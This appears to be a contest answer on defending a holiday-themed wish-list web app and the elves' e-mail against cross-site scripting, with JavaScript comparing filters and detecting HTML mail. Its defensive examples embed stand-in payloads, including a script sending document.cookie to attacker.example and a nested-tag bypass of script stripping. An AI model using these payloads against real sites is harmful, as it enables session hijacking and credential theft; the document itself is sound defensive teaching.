By Ryan Pavlik

What is the purpose of the first malicious wish text, and how does it work?
It is an image tag for an image that never actually displays (for instance, one sized to zero pixels), which causes the elves' browser to request a file from the naughty kid's web server. That request could simply be logged (revealing an internal IP address or similar, the browser's User-Agent string, etc.), or it could exploit a browser security hole such as a buffer overflow in the image decoder by serving a malformed image.
What is the purpose of the second malicious wish text, and how does it work?
This submits the contents of the viewing elf's browser cookie to the attacker, by passing it as a URL argument to a CGI script on the attacker's server. The cookie could contain, for instance, the session credential or even the password for the web application. By recording that cookie, the attacker could impersonate the elf who viewed that wish.
How could Hermey and Rudolph thwart the first and second types of attacks by altering the Web application? Alternatively, how could they stop these attacks by changing the configuration of the analyst elves' browsers?
They could have the web application filter out HTML tags, or possibly also the contents between them (to get rid of the script text, too); better still, the application could HTML-encode the wish text when displaying it, so that any tags a child submits are shown literally rather than interpreted by the browser. They could also disable JavaScript and images in the analyst elves' browsers, though this may disrupt navigation in the web app if it was not built to work with text alone. A safer route would be to disable JavaScript and disable loading images from remote servers. This last option can be found in the recent Mozilla and Mozilla Firebird browsers (mozilla.org).
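As an added example (not part of the original submission, and not the challenge's own web application), the following compares three ways the wish-list app could treat a submitted wish before putting it on the analyst elves' page: removing <script> tags, removing all tags, and HTML-encoding the text. The two wish payloads and the attacker hostname attacker.example and script name /log.cgi are constructed stand-ins, not the challenge's actual wish texts.

```javascript
// Constructed stand-ins for the two malicious wish texts discussed above.
// The hostname attacker.example and the script /log.cgi are assumptions.
const WISH_HIDDEN_IMAGE =
  'I want a pony <img src="http://attacker.example/track.gif" width="0" height="0">';
const WISH_COOKIE_THEFT =
  'I want a bike <script>document.location="http://attacker.example/log.cgi?c="+document.cookie</script>';

// Approach 1: strip <script> tags only (a blacklist). Looks sufficient,
// but a nested payload reassembles the tag after a single pass.
function stripScriptTags(text) {
  return text.replace(/<\/?script>/gi, "");
}

// Approach 2: strip every tag. Removes the markup, but the text between
// the tags (the script body) is still placed in the page as plain text.
function stripAllTags(text) {
  return text.replace(/<[^>]*>/g, "");
}

// Approach 3 (recommended): HTML-encode the five characters that can
// start markup or break out of an attribute value. The browser then
// renders the wish literally; nothing in it is parsed as a tag or script.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Does the filtered string still contain something a browser would
// parse as the start of a tag, comment or end tag?
function containsMarkup(text) {
  return /<[a-z!\/]/i.test(text);
}

// Constructed bypass of approach 1: one pass of removing "<script>" and
// "</script>" leaves a complete script element behind.
const NESTED_PAYLOAD = "<scr<script>ipt>alert(1)</scr</script>ipt>";

// Run a wish through all three filters and report what survives.
function compareFilters(wish) {
  return {
    scriptStripped: stripScriptTags(wish),
    tagsStripped: stripAllTags(wish),
    encoded: escapeHtml(wish),
    stillMarkupAfterScriptStrip: containsMarkup(stripScriptTags(wish)),
    stillMarkupAfterEncode: containsMarkup(escapeHtml(wish)),
  };
}

console.log(compareFilters(WISH_HIDDEN_IMAGE));
console.log(compareFilters(WISH_COOKIE_THEFT));
console.log(compareFilters(NESTED_PAYLOAD));
```

Encoding is the safer choice because it does not try to recognise "bad" markup at all: whatever the child typed is displayed as text, so the hidden image never loads and the cookie-stealing script never runs, while the elves can still see exactly what was submitted.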
Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different methods for defeating such attacks by altering an e-mail reader's configuration?
The simplest way of defeating this attack would be to disable HTML rendering in the e-mail reader. If that is not feasible, Hermey could instead disable JavaScript and remote images in e-mail, which should probably be disabled already. Additionally, if no HTML mail is wanted at all, the mail server could be set to filter out HTML e-mails.
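As an added example of the last option (not part of the original submission, and not any particular mail server's filter), the following checks a raw e-mail message for an HTML body part, descending into multipart messages so that an HTML part hidden inside a multipart/alternative wish list is still caught. The three sample messages, the addresses and the hostname attacker.example are constructed for the example.

```javascript
// Split a raw message (CRLF or LF line endings) into a header map and body.
// Folded header lines (continuations beginning with whitespace) are joined
// before parsing, so a Content-Type spread over two lines is handled.
function parseMessage(raw) {
  const text = raw.replace(/\r\n/g, "\n");
  const sep = text.indexOf("\n\n");
  const headerText = sep === -1 ? text : text.slice(0, sep);
  const body = sep === -1 ? "" : text.slice(sep + 2);
  const headers = {};
  for (const line of headerText.replace(/\n[ \t]+/g, " ").split("\n")) {
    const colon = line.indexOf(":");
    if (colon === -1) continue;
    headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return { headers, body };
}

// Parse a Content-Type value into its media type and parameters
// (a missing header defaults to text/plain, as RFC 2045 specifies).
function parseContentType(value) {
  const [type, ...params] = (value || "text/plain").split(";");
  const out = { type: type.trim().toLowerCase(), params: {} };
  for (const p of params) {
    const eq = p.indexOf("=");
    if (eq === -1) continue;
    out.params[p.slice(0, eq).trim().toLowerCase()] =
      p.slice(eq + 1).trim().replace(/^"|"$/g, "");
  }
  return out;
}

// Return one entry for every leaf part of the message whose type is text/html.
// Multipart containers are descended into recursively.
function findHtmlParts(raw) {
  const { headers, body } = parseMessage(raw);
  const ct = parseContentType(headers["content-type"]);
  if (ct.type === "text/html") return ["text/html"];
  if (ct.type.startsWith("multipart/") && ct.params.boundary) {
    const found = [];
    const chunks = body.split("--" + ct.params.boundary);
    // chunks[0] is the preamble; the chunk beginning "--" marks the closing boundary.
    for (const chunk of chunks.slice(1)) {
      if (chunk.startsWith("--")) break;
      found.push(...findHtmlParts(chunk.replace(/^\n/, "")));
    }
    return found;
  }
  return [];
}

// Policy from the answer above: if no HTML mail is wanted, reject any
// message that carries an HTML part anywhere in its structure.
function shouldRejectHtmlMail(raw) {
  return findHtmlParts(raw).length > 0;
}

// Constructed sample messages.
const PLAIN_MAIL = [
  "From: kid@example.net", "To: wishes@northpole.example",
  "Content-Type: text/plain; charset=us-ascii", "",
  "I want a sled.",
].join("\n");

const HTML_MAIL = [
  "From: naughty@example.net", "To: wishes@northpole.example",
  "Content-Type: text/html", "",
  '<p>I want a sled.</p><img src="http://attacker.example/track.gif" width="0" height="0">',
].join("\n");

// Plain-text part first, HTML part second: a reader with HTML rendering on
// would show the second part and load the remote image.
const ALTERNATIVE_MAIL = [
  "From: naughty@example.net", "To: wishes@northpole.example",
  "Content-Type: multipart/alternative;", '\tboundary="wish-boundary"', "",
  "--wish-boundary", "Content-Type: text/plain", "", "I want a sled.",
  "--wish-boundary", "Content-Type: text/html", "",
  '<p>I want a sled.</p><img src="http://attacker.example/track.gif">',
  "--wish-boundary--", "",
].join("\n");

for (const [name, msg] of Object.entries({ PLAIN_MAIL, HTML_MAIL, ALTERNATIVE_MAIL })) {
  console.log(name, shouldRejectHtmlMail(msg) ? "REJECT (HTML part)" : "accept");
}
```

A gentler policy is possible with the same parser: for a multipart/alternative message, keep the text/plain part and drop the text/html sibling instead of rejecting the whole wish list. Either way, the check belongs on the server, where it applies to every elf's mailbox regardless of how the individual e-mail readers are configured.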
Thank you!
Sincerely, Ryan Pavlik